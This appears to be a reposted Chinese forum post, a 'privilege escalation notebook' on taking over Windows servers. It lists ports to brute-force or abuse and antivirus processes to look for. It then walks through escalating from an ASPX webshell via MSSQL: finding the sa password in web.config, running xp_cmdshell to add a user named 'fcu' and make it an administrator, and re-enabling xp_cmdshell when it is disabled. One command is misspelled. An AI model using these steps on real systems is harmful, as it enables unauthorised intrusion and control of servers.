提权笔记本(1)

21------------FTP //找到其FTP目录,破解其密码搜索,提之
22------------linux终端
23------------telnet //可以爆破,然后dos连接之,连接后添加用户开启终端端口,然后宣告拿下!
1433----------mssql提权 //需要找到sa密码,一般存在于web.config文件中,uid pwd sa为关键字,找到该文件后Ctrl+f搜索关键字提之
3306----------mysql提权 //需要找到root密码,提之.
4899----------radmin //破解注册表提权
43958---------serv -u提权 //一般shell自带的都有,直接使用自带的进行提权尝试即可。
5900----------vnc提权 //VNC提之
[此目录大多可读可写]
C:\windows\temp\


[服务器常见的杀毒软件]
360tray.exe 360实时保护
ZhuDongFangYu.exe 360主动防御
KSafeTray.exe 金山卫士
McAfee McShield.exe 麦咖啡
SafeDogUpdateCenter.exe 安全狗

【filezilla提权】
提权思路:


【mssql提权/1433提权/sa提权/sa提权/mssql数据库提权】
关于mssql 的注入,可以使用sqlninja 来恢复组建等操作,该工具与sqlmap 不同的是偏向于获得shell。kali里有。
思路:最主要的还是找到mssql数据库的账号密码,找到之后执行mssql命令提权,如果cmd_shell组建被删除也可以进行自己修复(工具包里的sql查询分析器)
也可以在aspx的shell下进行操作,你懂的啦~哦,对了,可以用sql综合利用工具直接连接了之后进行dos操作!你懂~~如果说3389没开,也可以用mssql执行
命令开启啦,至于命令嘛 百度一下你就知道


找配置文件,配置文件一般都是web.config或者conn.asp再或config.asp之类的文件(也可以到注册表找sa密码)

在配置文件内找到mssql连接信息,即mssql的账号密码等配置信息,uid,pwd即为其账号密码。直接在aspx马子哪儿找到
数据库选择mssql数据库,然后完整填写好数据库连接信息.然后直接在哪儿执行一下提权命令.
格式:exec master.dbo.xp_cmdshell ‘命令‘;--
SQL增加用户:exec master.dbo.xp_cmdshell ‘net user fcu xieyingshentouxiaozu /add‘;--
SQL提升权限:exec master.dbo.xp_cmdshell ‘net localgroup administrators fcu /add‘;--

倘若执行不了命令可能xp_cmdshell组建删除,执行该命令即可Use master dbcc addextendedproc(‘xp_cmdshell‘,‘xplog70.dll‘)
(在aspx环境下)开启cmd_shell方法
sqlExec:XP_cmdshell exec

(可以用sql查询分析器下)开启cmd_shell方法
连接上去后
执行以下代码:
EXEC sp_configure ‘show advanced options‘, 1
GO
RECONFGURE
GO
EXEC sp_configure ‘xp_cmdshell‘, 1
GO
RECONFIGURE
GO
转载请注明本文链接: http://www.mayidui.net/t2292.html
游客
登录后才可以回帖,登录 或者 注册